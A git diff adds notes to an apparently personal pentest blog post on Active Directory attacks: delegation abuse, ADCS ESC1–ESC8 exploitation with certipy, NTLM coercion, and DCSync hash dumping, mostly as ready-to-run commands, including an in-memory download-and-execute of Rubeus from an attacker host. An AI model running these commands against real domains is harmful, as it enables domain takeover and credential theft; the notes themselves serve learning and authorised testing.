Add Delegation notes + ADCS + DCSync

--- a/_posts/Notes/AD/2024-04-08-AD.md
+++ b/_posts/Notes/AD/2024-04-08-AD.md
@@ -144,6 +144,7 @@ We can now try to crack them all using `hashcat`:
 
 It may be worth mentioning that we can exploit AS-REProasting as an unauthenticated attacker. We just need to know the domain name (visible in crackmapexec output) and the username (that we can bruteforced with kerbrute or using a user list like we did earlier).
 
+
 ### Golden / Silver Tickets
 
 First of all, Golden and Silver tickets are used for persistence. This mean that you won't use it on CTFs or pentest but it is a well known persistence method so it is good to know it.
@@ -154,9 +155,370 @@ Lets start with silver tickets. A `Silver Ticket` grants us access to a specific
 
 #### Golden Tickets
 
-`Golden Tikets` allows us to have unrestricted access to a whole domain by generating a `TGT` for any user. To be able to do that, we need to have access to the `krbtgt` keys and to get those, we need to be domain admin (DA).
+`Golden Tikets` allows us to have unrestricted access to a whole domain by generating a `TGT` for any user. To be able to do that, we need to have access to the `krbtgt` key and to get this, we need to be domain admin (DA).
 
 ### Delegations
 
-TODO
+Delegation is a mechanism in which a machine (the delegation server) can impersonate a user on a service. This means that the service think that the user ask for the resource where in reality it is the delegation server that is asking the resource to the server and then forward it to the user.
+
+I will not get into too much detail here. you can have more information about the delegation on [the hacker recipes](https://www.thehacker.recipes/a-d/movement/kerberos/delegations) or [hackndo](https://en.hackndo.com/constrained-unconstrained-delegation/). They both are inspired by the article of Elad Shamir [Wagging the Dog](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) and this article is much more detailed than the two previous blogs. [Here](https://youtu.be/byykEId3FUs) is also a talk about delegation presented by Shutdown ([@nwodtuhs](https://twitter.com/_nwodtuhs)). (The french version [here](https://www.youtube.com/watch?v=7_iv_eaAFyQ)).
+
+> I will use the appellation `delegation server`. This can be any kind of server (web, share, database...) that does the mechanism of delegation. Its role isn't only to delegate.
+{: .prompt-warning}
+
+#### Unconstrained Delegation
+
+This type of delegation was the first one created. It is not recommended to use it anymore. This allows the `Unconstrained Delegation` server to impersonate any user for any service. The only users that can't be impersonated are the one in the group `Protected Users` and the one with the flag `NOT_DELEGATED` in the [UserAccountControl](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties) attribute of the user account.
+
+| ![[unconstrained_delegation_schema]](https://en.hackndo.com/assets/uploads/2019/02/unconstrained_delegation_schema.png) |
+| :---------------------------------------------------------------------------------------------------------------------: |
+|                                                   **Source: HacknDo**                                                   |
+
+
+The client connect to the service by sending its `ST`. Inside his `ST`, the `DC` puts a copy of the user's `TGT`. That service uses this `TGT` to impersonate the client to any other service.
+
+To exploit the delegation mechanisms, you'll need the hash of the service account or being admin of the machine.
+
+Here we will have as an exemple an unconstrained delegation between `PC` and `DC`.
+
+First connect to the machine (`PC`) then launch `Rubeus` in memory like so:
+```powershell
+$data = (New-Object System.Net.WebClient).DownloadData('http://$KALI_IP:8080/Rubeus.exe')
+$assem = [System.Reflection.Assembly]::Load($data);
+[Rubeus.Program]::MainString("triage");
+```
+
+This command allows you to list all available tickets. Now we can use `coercer` to force a connection from `PC` to `DC`:
+
+```bash
+python3 coercer.py -u $ADMIN_PC -d $DOMAIN_PC -p $PASS_ADMIN_PC1 -t $DC -l $PC_NAME 
+```
+CHECK COMMAND
+
+Now if you run again the `triage` command, you should see the `krbtgt` ticket in the list. To recover it, you can use the following command:
+
+```powershell
+[Rubeus.Program]::MainString("dump /user:$MACHINE_NAME_DC /service:krbtgt /nowrap");
+```
+
+Now, we have a base64 ticket, you can convert it as a `ccache` file like so:
+```bash
+cat tgt.b64|base64 -d > ticket.kirbi
+ticketConverter.py ticket.kirbi ticket.ccache
+export KRB5CCNAME=/PATH/TO/ticket.ccache
+```
+
+And now we can use it to use command with this ticket like `SecretsDump` for exemple using the `-k` option.
+
+#### S4U2Self
+
+`S4U2Self` is an extension of `Kerberos`. It allows a machine that does delegation to impersonate a user on itself. To be more specific, it allows the machine to get a `ST` for its service (itself) as any user. This is very convenient when a service does not use `Kerberos` as its authentication mechanism.
+
+Lets say that you try to connect to a service that uses the `Net-NTLM` authentication mechanism. `Net-NTLM` doesn't use tickets, it is not related to `Kerberos`. This means that the delegation mechanism can't work because it relies on the use of `ST`. 
+
+> `Protocol Transition` (PT) is the name of this mechanism. `PT` is the mechanism that allow connection from other protocols than `Kerberos` on a `Kerberos` environment. Protocol Transition is only applicable to `Constrained Delegation`, not RBCD. It does not allow a connection from another protocol, it allows a delegation from another protocol to kerberos.
+{: .prompt-info}
+
+This is where the `Protocol transition` (PT) enter the scene. This will allow us to get a valid ST for our own service using `S4U2Self` for the user that just authenticated using `Net-NTLM` or an attacker can use it to impersonate any user on our service machine like the admin for example. 
+
+`S4U2Self` produces forwardable tickets only if the user is not a member of the `protected user` group or if it does not have the `UAC NOT_DELEGATED` attribute set. It will be important for `S4U2Proxy`.
+
+#### S4U2Proxy
+
+`S4U2Proxy` as `S4U2Self` is also an extension of `Kerberos`. It allows the delegation server to ask for a `ST` for "any" user and usable on any service on which it has permission to delegate (only works with `Kerberos`). To be able to do that, `S4U2Proxy` needs a forwardable `ST`. The `forwardable` flag of a `ST` can be obtained thanks to `S4U2Self` (only if the two upper conditions specified in the `S4U2Self` section are not set).
+
+#### Constrained Delegation
+
+Then the `Constrained Delegation` was created. Here, the constrained delegation server can only impersonate users on specific services. As you can see on the bellow schema, the user can be impersonated only on the file server and not on the two other. 
+
+| ![[constrained_delegation_schema.png]](https://en.hackndo.com/assets/uploads/2019/02/constrained_delegation_schema.png) |
+| :---------------------------------------------------------------------------------------------------------------------: |
+|                                                   **Source: HacknDo**                                                   |
+
+The `Contrained Delegation` server ask the DC (Domain Controller) if it can receive a `ST` (Service Ticket) as the specified user. This is possible thanks to [Self4U2Self](#S4U2Self)
+
+> Note that the information about if the `Constrained Delegation` server is allowed or not to impersonate a user on a specific server is stored in the DC not on the `Constrained Delegation` server.
+{: .prompt-note}
+
+> Only DA (Domain Admin) can change the delegation rights. 
+{: .prompt-warning}
+
+To exploit the `Constrained Delegation`, we first need to find it using the following command:
+
+```bash
+findDelegation.py $DOMAIN/$USER:$PASSWORD -target-domain $TARGET_DOMAIN
+```
+
+Now there is two scenarios. The first one is if there is protocol transition on the service that has the right to delegate.
+
+##### With protocol transition
+
+In this case, we first need to ask a `TGT` for the user we want to impersonate, then execute S4U2Self followed by S4U2Proxy to impersonate the administrator.
+
+For Windows, you can use `Rubeus`:
+
+```powershell
+.\Rubeus.exe asktgt /user:$USER /domain:$DOMAIN /password:$PASSWORD
+.\Rubeus.exe s4u /ticket:$TICKET /impersonateuser:administrator /msdsspn:CIFS/$DC_NAME /ptt
+```
+
+Or on Linux:
+
+```bash
+getST.py -spn "CIFS/$DC_NAME" -impersonate Administrator -dc-ip $DC_IP $DOMAIN/$USER:$PASSWORD
+```
+
+With the received ticket, we can export it and then use it to connect to the machine with tools like `smbexec`, `psexec`, `wmiexec`...
+
+> You need to export the ticket using the `export KRB5CCNAME=/PATH/TO/ticket.ccache` command
+{: .prompt-info}
+
+##### Without Protocol transition
+
+In this case, we need a forwardable `ST` as the administrator to any service on the server. Here, we can't just ask for the `ST` like we did earlier with protocol transition so we need to create a machine and add delegation from our created machine to the server (that has delegation). Why would we do that ? Because the resulted `ST` from our created machine is a forwardable ticket on the server (that has delegation).
+
+First, we create our machine:
+```bash
+addcomputer.py -computer-name 'rbcd_created_machine$' -computer-pass 'rbcdpass' -dc-host $DC_IP $DOMAIN/$USER:$PASSWORD
+```
+
+Now, we add the `RBCD` from `rbcd_created_machine$` to the server with `Constrained Delegation`.
+```bash
+rbcd.py -delegate-from 'rbcd_created_machine$' -delegate-to $SERVER_NAME_WITH_DELEGATION -dc-ip $DC_IP -action 'write' -hashes ":$SERVER_HASH" $DOMAIN/$SERVER_NAME_WITH_DELEGATION
+```
+
+Now that everything is set up, we can use `S4U2Slef` followed by `S4U2Proxy` on the server with delegation.
+
+```bash
+# s4u2self on rbcd_created_machine
+getST.py -self -impersonate "administrator" -dc-ip 192.168.56.11  north.sevenkingdoms.local/'rbcd_created_machine$':'rbcdpass'
+
+# s4u2proxy from rbcd_created_machine to $SERVER_NAME_WITH_DELEGATION
+getST.py -impersonate "administrator" -spn "host/$SERVER_NAME_WITH_DELEGATION" -additional-ticket 'TICKET_NAME.ccache' -dc-ip $DC_IP  $DOMAIN/'rbcd_created_machine$':'rbcdpass'
+```
+
+or using only one command:
+
+```bash
+getST.py -spn "host/$SERVER_NAME_WITH_DELEGATION" -impersonate Administrator -dc-ip $DC_IP  $DOMAIN/'rbcd_created_machine$':'rbcdpass'
+```
+
+And finally, we use our forwardable ticket we just received to get a `ST` as the administrator on the `DC` and connect to it:
+
+```bash
+getST.py -impersonate "administrator" -spn "http/$DC_NAME" -altservice "cifs/$DC_NAME" -additional-ticket 'TICKET_OF_ADMIN_OF_SERVER.ccache' -dc-ip $DC_IP -hashes ":$SERVER_HASH" $DOMAIN/$SERVER_NAME_WITH_DELEGATION
+
+export KRB5CCNAME=/PATH/TO/TICKET_OF_ADMIN_OF_DC.ccache 
+wmiexec.py -k -no-pass $DOMAIN$/administrator@$DC_NAME
+```
+
+#### Resource Based Constrained Delegation
+
+`Resource Based Constrained Delegation` (RBCD) works the other way around. It is not the `RBCD` server that check if it has the right to impersonate the service (ex: web server).The machine account can change its own attribute and not only the DA can change it on the DC. If the machine is compromised, then we can get the hash of the machine account and then continue the attack. This means that if you create a machine (MachineAccountQuota > 0) then you can specify that a specific server can impersonate your machine.
+
+| ![[resource_based_constrained_delegation_schema.png]](https://en.hackndo.com/assets/uploads/2019/02/resource_based_constrained_delegation_schema.png) |
+| :---------------------------------------------------------------------------------------------------------------------------------------------------: |
+|                                                                  **Source: HacknDo**                                                                  |
+
+To exploit an `RBCD`, we first need to create a machine:
+
+```bash
+addcomputer.py -computer-name 'rbcd_created_machine$' -computer-pass 'rbcdpass' -dc-host $DC_IP $DOMAIN/$USER:$PASSWORD
+```
+
+Now, we add the `RBCD` from `rbcd_created_machine$` to the server with `RBCD`.
+```bash
+rbcd.py -delegate-from 'rbcd_created_machine$' -delegate-to $SERVER_NAME_WITH_DELEGATION -dc-ip $DC_IP -action 'write' -hashes ":$SERVER_HASH" $DOMAIN/$SERVER_NAME_WITH_DELEGATION
+```
+
+Our created machine has now delegation permission on our target, we can now use `S4U2Self` followed by `S4U2Proxy` and get an administrator ticket for the `DC`:
+
+```bash
+getST.py -spn "cifs/$DC_SPN" -impersonate Administrator -dc-ip $DC_IP $DOMAIN/'rbcd_created_machine$':rbcdpass
+
+export KRB5CCNAME=TICKET_OF_ADMIN_OF_DC
+wmiexec.py -k -no-pass @$DC_SPN
+```
+
+### ADCS
+
+`ADCS` or `Active Directory Certificate Services` is Microsoft's PKI (Public Key Infrastructure). This means that `ADCS` allows integrity, authentication, non repudiation and confidentiality. Here we will be talking about `ESC1` to `ESC8` used for domain escalation. `ESC` stand for `Escalation`.
+
+The main idea is that if you have enough rights, you can ask for certificates for a specific user, recover its `NT` hash and pass it or crack it.
+
+Those appellations `ESCX` come from [this paper](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf) from [Will Schroeder](https://twitter.com/harmj0y) and [Lee Christensen](https://twitter.com/tifkin_) also explained [in this blog](https://posts.specterops.io/certified-pre-owned-d95910965cd2) in a funnier way :). 
+
+Here are the meaning of each `ESC` based on this paper:
+
+- `ESC1`: Domain escalation via No Issuance Requirements + Enrollable Client
+Authentication/Smart Card Logon OID templates + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+
+- `ESC2`: Domain escalation via No Issuance Requirements + Enrollable Any Purpose
+EKU or no EKU
+
+- `ESC3`: Domain escalation via No Issuance Requirements + Certificate Request
+Agent EKU + no enrollment agent restrictions
+
+- `ESC4`: Domain escalation via misconfigured certificate template access control
+
+- `ESC5`: Domain escalation via vulnerable PKI AD Object Access Control
+
+- `ESC6`: Domain escalation via the EDITF_ATTRIBUTESUBJECTALTNAME2 setting on
+CAs + No Manager Approval + Enrollable Client Authentication/Smart Card
+Logon OID templates
+
+- `ESC7`: Vulnerable Certificate Authority Access Control
+
+- `ESC8`: NTLM Relay to AD CS HTTP Endpoints
+
+Well this is a lot... But we have a wonderful tool that allows us to check if the `ADCS` is vulnerable and can also be used to exploit it. Please welcome [certipy](https://github.com/ly4k/Certipy)!!!
+
+#### Vulnerable ADCS
+
+To check if an `ADCS` is vulnerable, you will have to run the following command:
+
+```bash
+certipy find -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -vulnerable
+```
+
+The output should look like this:
+IMAGE
+
+##### ESC1
+
+As you can see, the `CA` (Certificate Authority) is vulnerable to `ESC1`. To be able to exploit it you can recover the admin certificate:
+
+```bash
+certipy req -u $USER@$DOMAIN.local -p $PASSWORD -target $CA_SERVER.$DOMAIN.local -template ESC1 -ca $CA_NAME -upn administrator@$DOMAIN.local
+```
+
+Now, we should have a file called `administrator.pfx`. With this file, we can use it to recover the administrator `NT` hash:
+
+```bash
+certipy auth -pfx administrator.pfx -dc-ip $DC_IP
+```
+
+##### ESC2 /ESC3
+
+With `ESC2` and `ESC3` are using the enrollment agent to request a certificate. As for `ESC1`, we use `certipy` to request a certificate:
+
+```bash
+certipy req -u $USER@$DOMAIN.local -p $PASSWORD -target $CA_SERVER.$DOMAIN.local -template ESC2 -ca $CA_NAME
+```
+
+
+```bash
+certipy req -u $USER@$DOMAIN.local -p $PASSWORD -target $CA_SERVER.$DOMAIN.local -template User -ca $CA_NAME -on-behalf-of '$NETBIOS_NAME\administrator' -pfx $OUR_USER.pfx
+```
+
+
+Now that we have the admin certificate, we can use it to recover the `NT` hash:
+
+```bash
+certipy auth -pfx administrator.pfx -dc-ip $DC_IP
+```
+
+As you may have notice, we did this for the template `ESC2`, but we can run the following commands to exploit `ESC3-CRA` and `ESC3` templates:
+
+```bash
+certipy req $USER@$DOMAIN.local -p $PASSWORD -target $CA_SERVER.$DOMAIN.local -template ESC3-CRA -ca $CA_NAME
+```
+
+Or
+
+```bash
+certipy req $USER@$DOMAIN.local -p $PASSWORD -target $CA_SERVER.$DOMAIN.local -template ESC3 -ca $CA_NAME -on-behalf-of '$NETBIOS_NAME\administrator' -pfx $OUR_USER.pfx
+```
+
+And finally get the `NT` hash:
+
+```bash
+certipy auth -pfx administrator.pfx -username administrator -domain $DOMAIN.local -dc-ip $DC_IP
+```
+
+> Because the recovery of the `NT` hash is always the same command, I will not write this step anymore but you can check the `ESC1` and `ESC2/ESC3` to see how it is done.
+{: .prompt-warning}
+##### ESC4
+
+In `ESC4`, we will write privilege over a certificate template. Here, we are going to cheat a bit XD. We are not going to exploit `ESC4` as we did with the previous template exploit. Here, we are going to use `ESC4` to change the template and make it vulnerable to `ESC1`:
+
+```bash
+certipy template -u $USER@$DOMAIN.local -p $PASSWORD -template ESC4 -save-old -debug
+```
+
+Now that the template is vulnerable to `ESC1`, we can exploit it as follows:
+
+```bash
+certipy req -u USER@$DOMAIN.local -p $PASSWORD -target $CA_SERVER.$DOMAIN.local -template ESC4 -ca $CA_NAME -upn administrator@$DOMAIN.local
+```
+
+> Because we did a modification over the template, we can rollback to the previous template using this command `certipy template -u USER@$DOMAIN.local -p $PASSWORD -template ESC4 -configuration ESC4.json`  The `ESC4.json` is generated in the first command thanks to the parameter `-save-old`.
+{: .prompt-tip}
+
+##### ESC5 
+
+Because `ESC5` is less common and used so here is [a link](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c) that explains it in detail.
+
+##### ESC6
+
+With `ESC6`, we are going to abuse the `ATTRIBUTESUBJECTALTNAME2` flag set on the `CA`. This flag allows the enrollee to specify an arbitrary SAN (Subject Alternative Name) on all certificates despite a certificate template's configuration. To get the certificate, we can run the following command:
+
+```bash
+certipy req -u USER@$DOMAIN.local -p $PASSWORD -target $CA_SERVER.$DOMAIN.local -template User -ca $CA_NAME -upn administrator@$DOMAIN.local
+```
+
+##### ESC7
+
+As for `ESC5`, `ESC7` is also not common and used so here is [another link](https://www.tarlogic.com/blog/ad-cs-esc7-attack/) to get more information about it.
+
+##### ESC8
+
+`ESC8` is a bit different. We don't request directly a certificate and use it to get the administrator `NT` hash. Here we are going to use NTLM Relay (this attack will be explained in more detail in the next chapter). But the main idea is that we are going to receive a connexion with a `Coertion` for exemple (`Coertion` is the action to force a machine account to authenticate to us.) and then use this received connexion (from a NTLM challenge sent to the machine account) to pass it to the same protocol or a different one (for more information check out the NTLM relay chapter). For more simple exemple, we are going to use `certipy` that will do the NTLM relay for us.
+
+First, we use `certipy` as a listener:
+
+```bash
+certipy relay -ca $CA_IP -template DomainController
+```
+
+Now we are going to use the tool [petitpotam](https://github.com/topotam/PetitPotam) that will trigger the coertion:
+
+```bash
+petitpotam.py $OUR_IP $DC_NAME.$DOMAIN.local
+```
+
+> We could have used `Responder` ot `mitm6` to recover the connection instead of `petipotam`. This will not use coertion but spoof different protocols to recover a connection and send it to certipy.
+{: .prompt-warning}
+
+We recover the `NT` hash and `TGT` of the DC from the certificate :
+
+```bash
+certipy auth -pfx CERTIFICATE.pfx -dc-ip $DC_IP
+```
+
+> For information purpose, in all above cases, `certipy auth` does not always work, but even when we can't use it, the ESC is still exploitable by other means.
+{: .prompt-tip}
+
+
+### NTLM Relay
+
+Coming soon
+
+### DCSync
+
+
+We have seen a lot of attacks by now on an AD. Some of them allowed us to get `domain admin` access (access over all the domain like DC and servers). When we are `domain admin` or if we have a user with `DCSync` write, a cool thing to do is to recover every hash of every user and every machine. And when we do that, we can connect as any user on any machine (if it is allowed). Hence, because we also have the `domain admin` hash, we can connect with it on any machine of the domain.
+
+This attack is called [DCSync](https://www.thehacker.recipes/a-d/movement/credentials/dumping/dcsync)  (dump of the DC information). We can use tools like `secretsdump` to do that using a Kerberos ticket : 
+
+```bash
+export KRB5CCNAME=/workspace/esc8/CCACHE_FILE.ccache
+secretsdump -k -no-pass $DOMAIN.LOCAL/"$MACHINE"@$DC_NAME.$DOMAIN.local
+```
+
+Or, we could just dump all the hash of the domain using the `NT` hash instead of the `TGT`:
+
+```bash
+secretsdump -hashes ":$NT_HASH_OF_DC_ACC" -no-pass $DOMAIN.LOCAL/"$MACHINE"@$DC_NAME.$DOMAIN.local
+```
 
